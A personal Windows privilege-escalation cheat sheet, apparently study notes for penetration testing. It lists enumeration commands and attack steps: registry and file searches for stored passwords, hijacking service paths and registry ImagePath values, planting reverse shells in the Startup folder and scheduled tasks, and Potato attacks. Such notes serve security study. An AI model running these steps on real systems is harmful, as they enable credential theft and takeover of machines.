Windows Priv Esc

Enumeration
1. System
  1. systeminfo
    1. Gets all possible version about system
  2. Hostname
  3. wmic qfe
    1. windows management instrumentation:- Shows hotfixes
  4. wmic logicaldisk
2. User
  1. whoami
    1. whoami /priv
    2. Whoami /groups
  2. netuser username
    1. shows all user and their related info
  3. net localgroup
    1. shows all groups present on a system
3. Network
  1. route print
    1. shows Interface list, IPV4 route table and tons of other routing information
  2. netstat -ino
    1. all open ports
4. Passwords
  1. to find passwords everywhere
    1. find /si password *.txt
      1. Search for phrase password in all the files ending with .txt
      2. searches in the directory you are in right now
5. AV FW detection
  1. sc query windefend
    1. service control query windefend
  2. sc query type= service
    1. tells about all the services running on a device
  3. netsh advfirewall firewall dump
  4. netsh firewall show state
  5. netsh firewall show config
6. Auto enumeration
  1. Executables
    1. Winpeas
      1. requires .net 4+ on target system
    2. seatbelt
    3. watson
    4. sharpup
    5. If executable are not allowed then run powershell commands
      1. If none of them is working, run recon scan from meterpreter. post/multi/recon/local_exploit_suggester
  2. powershell
    1. sherlock
    2. PowerUp.ps1
    3. jaws-enum
7. Msfconsole
  1. run post/multi/recon/local_exploit_suggester
    1. Suggests all available xploits
8. Manual
Passwords
1. Reg
  1. Reg query HKLM /f password /t REG_SZ /s
    1. Local Machine
  2. Reg query HKCU /f password /t REG_SZ /s
    1. Current USer
2. runas /savecred /user:admin c:/pathtoreverseshell
Service Exploits
1. Enum
  1. sc.exe qc/query/config
  2. net /start/stop
  3. Winpeas
2. Insecure Service permissions
  1. Signs:- CHANGE_CONFIG,ALL_ACCESS
    1. If logged in USER has permission to change config of a service running as root
    2. Should be able to start and stop the service
    3. These things are shown by winpeas
      1. To check manually:- .\accesschk.exe /accepteula -uwcqv user servicename
  2. To query Service configuration to check what its really doing
    1. sc qc servicename
  3. To check Current state ,
    1. sc query servicename
  4. If user has ability to modify binary path then he can change it to malicious exe file
    1. sc config servicename binpath=""
3. Unquoted Service Paths
  1. Ususally Shown by Winpeas
  2. First Check what actions are allowed. If yes
    1. .\accesschk.exe /accepteula -ucqv user servicename
  3. Now check for write permissions in each directory in existing binary
    1. .\accesschk.exe /accepteula -uwdq servicename
  4. If you find write permission then make a exe file in that directory with its name as first letter immediately after / of next directory
4. Weak Registry Permissions
  1. Winpeas Shows registry is modifiable
  2. To verify , ancd check if we are able to edit
    1. cmd:- .\accesschk.exe /accepteula -uvwqk HKLM\registrypath
    2. PS:- Get-Acl HKLM/path | Format-List
  3. To check current value of registry
    1. reg query HKLM/path
    2. Now after verifying that it runs as system, Change ImagePath value to our exe path
      1. reg add HKLM\originalpath /v ImagePath /t REG_EXPAND_SZ /d maliciouspath /f
5. Insecure Service Executables
  1. IF YOU ARE DOING THIS ON REAL SYSTEM, CREATE BACKUP OF ORIGINAL EXE BEFORE EXPLOITING
  2. Check for service exe writable for everyone. Shown by winpeas
  3. Verify withaccess check to see if we can start stop
    1. .\accesschk.exe /accepteula -quvw servicename
  4. If yes then copy malicious exe
  5. copy source destination
6. DLL
Kernel Exploits
1. Github/secWiki/Windows Kernel Exploits
2. All depends on enumeration
3. Identify kernel version and search for relevant exploits
4. -:Tools
  1. Windows Exploit Suggestor
    1. Takes Sysinfo output file as input
  2. Watson
Scheduled Tasks
1. cmd:- schtasks /query /fo LIST /v
2. ps:- Get-ScheduledTask | where {$_.TaskPath -notlike "Microsoft* | ft Taskname,TaskPath,State"}
3. Find scripts running every minuite. if found add shell command to it to get a shelll as Nt authority
4. To check Permission:- .\accesschk.exe /accepteula -uqv user filename/scri[pt name
5. Give it a path to malicious executable
Insecure GUI APPS
1. Since parent process is run as admin, Child process will also run as admin
2. To see privilages:-tasklist /v | findstr processname
StartUp Apps
1. C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp :- All programs starting at boot are placd here
  1. If reverse shell is placed in this directory, then it will get executed once system starts
2. .\accesschk.exe /accepteula -d path
  1. To check access privilages
  2. Builtin Users Groups has write access to this directory by default
3. USe a VB script available on net to make a shortcut in startup directory
Installed Apps
1. Exploits can be foun specific to the apps running on the system. Simply search for them on Exploit-db
Hot Potato
1. Works on win 7 8 and early win10
2. It is a spoofing attack
3. It involves authenticating Windows user to a fake HTTP server using NTLM
4. Ntlm credentials are then used to get command execution using SMB
5. Requires to have a shell as normal user, then privilages are escalated using potato.exe by giving arguments as IP and Reverse shell.exe generated with MSF Venom
Juicy Potato
1. Takes advantage of service Accounts
2. Intercepts System Tickets and uses it to impersonate System User
3. Check if SetImpersonation Privilage is enabled or SeAssignPrimaryToken is enabled. IF YES THEN JUICY POTATO
4. Hacktricks has awesome info about its usage
Port Forwarding
1. Plink
Priv Esc Strategy
1. Check Your user and Group you are into using netuser command
2. Subtopic 2
Download Tiberus Github Repo
Enumeration Scripts
1. Windows Exploit Suggestor
  1. ./wes --database --systeminfo
2. Winpeas
  1. x86,x64,bat file
By Kaustubh chude
1. https://www.linkedin.com/in/kaustubh-chude-3124801a7